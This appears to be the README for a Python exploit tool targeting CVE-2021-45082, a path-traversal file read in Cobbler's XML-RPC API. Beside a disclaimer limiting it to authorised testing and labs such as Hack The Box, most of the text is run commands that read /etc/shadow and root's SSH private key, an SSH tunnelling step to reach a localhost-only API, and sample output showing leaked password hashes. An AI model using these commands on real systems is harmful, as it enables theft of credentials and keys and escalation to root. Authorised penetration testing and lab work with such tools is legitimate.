A Python exploit tool for reading arbitrary files through Cobbler's XML-RPC API vulnerability. This tool leverages improper input validation in Cobbler's template_files feature to read sensitive files with root privileges.
Cobbler is a Linux installation server that allows for rapid setup of network installation environments. This exploit targets a vulnerability in Cobbler's XML-RPC API (typically running on port 25151) where the template_files mapping feature doesn't properly validate file paths, allowing authenticated users to read arbitrary files on the system.
- CVE ID: CVE-2021-45082
- Affected Component: Cobbler < 3.3.1
- Vulnerability Type: Arbitrary File Read / Path Traversal
- Required Access: Authenticated access to Cobbler API (or unauthenticated if misconfigured)
- Impact: Read any file on the system with root privileges
- CVSS Score: High (Information Disclosure leading to Privilege Escalation)
FOR EDUCATIONAL PURPOSES ONLY
This tool is provided for educational purposes and authorized penetration testing only. Unauthorized access to computer systems is illegal. The author assumes no liability for misuse of this tool.
Only use this tool on:
- Systems you own
- Systems you have explicit written permission to test
- Authorized CTF/Lab environments (like Hack The Box)
- Python 3.x
xmlrpc.client(built-in)- Network access to Cobbler XML-RPC API (port 25151)
- SSH access for port forwarding (if service is localhost-only)
# Read a specific file
python3 CVE-2021-45082.py /etc/shadow
# Read root's SSH private key
python3 CVE-2021-45082.py /root/.ssh/id_rsa
If Cobbler API is only accessible on localhost (127.0.0.1:25151):
# In Terminal 1: Establish SSH tunnel
ssh -L 25151:127.0.0.1:25151 user@target-host
# In Terminal 2: Run the exploit
python3 CVE-2021-45082.py /etc/shadow# Run without arguments for interactive mode
python3 CVE-2021-45082.py
# You'll be prompted:
# [?] Enter file path to read (e.g., /etc/shadow):$ python3 CVE-2021-45082.py /etc/shadow
============================================================
Cobbler Arbitrary File Read Exploit
============================================================
[*] Target file: /etc/shadow
[*] Connecting to Cobbler API...
[*] Logging in...
[*] Creating fake distribution...
[*] Creating fake profile...
[*] Mapping /etc/shadow -> /leak
[*] Syncing...
[+] Exploit setup complete!
============================================================
FILE: /etc/shadow
============================================================
root:$6$xyz...:19234:0:99999:7:::
daemon:*:19234:0:99999:7:::
...
============================================================